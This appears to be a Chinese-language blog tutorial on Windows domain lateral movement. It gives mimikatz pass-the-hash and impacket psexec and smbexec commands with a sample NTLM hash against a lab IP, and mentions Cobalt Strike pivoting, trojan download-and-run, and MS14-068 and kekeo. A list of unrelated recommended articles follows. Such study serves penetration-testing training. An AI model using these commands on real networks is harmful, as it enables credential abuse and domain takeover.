内网安全-横向移动&PTH 哈希&PTT 票据&PTK 密匙&Kerberos&密码喷射

一.域横向pth,mimkatz,NTLM

windwos server 2012 R2之前可能是NTLM和LM,之后为NTLM

1.mimkatz ptk

使用mimkatz进行横向移动

mimikatz sekurlsa::pth /user:administrator(目标本地用户名) /domain:192.168.3.32(目标ip) /ntlm:518b98ad4178a53695dc997aa02d455c(目标hash)

在执行命令机器弹出cmd窗口

使用该命令进行传递木马

创建bshell:

执行:

在内网攻击机器进行hash传递

cs上配置socket节点

配置代理

使用psexec进行hash传递返回被控机器shell终端:

.\psexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

上线cs:

1.上传木马到web目录

2.使用cmd下载木马并且执行

使用smbexec进行传递

.\smbexec.exe -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32

2.pth-漏洞&kekeo&Ticks

1.ms14068

2.kekeo(高权限,需要NTGM)

相关推荐
数字供应链安全产品选型1 小时前
新一代开源数字供应链安全审查与治理平台:悬镜源鉴SCA
网络·人工智能·安全·开源·开源软件
jinan8861 小时前
图纸的安全怎么管理?
大数据·图像处理·人工智能·安全
暴躁的小胡!!!1 小时前
软件安全分析与应用之Web安全(二)
网络·安全·web安全
黑客KKKing13 小时前
云计算VS网络安全,应该怎么选?
网络·安全·web安全·云计算
群联云防护小杜13 小时前
语音视频App协议安全实战:防御伪造/窃听/Deepfake攻击
运维·服务器·爬虫·安全·web安全·音视频
网络安全-老纪13 小时前
开源安全测试工具 | 网络安全工具列表
测试工具·安全·web安全·开源
和道一文字yyds14 小时前
16天 - 单例模式有哪几种实现?如何保证线程安全?什么是策略模式?一般用在什么场景?什么是模板方法模式?一般用在什么场景?
安全·单例模式·策略模式
晨航14 小时前
天津大学:《深度解读DeepSeek:部署、使用、安全》
人工智能·安全·ai·prompt·aigc
爱吃烤鸡翅的酸菜鱼15 小时前
Java【多线程】(3)单例模式与线程安全
java·开发语言·安全·单例模式·intellij idea
恒星科通16 小时前
隧道定向号角喇叭为隧道安全保驾护航
网络·人工智能·安全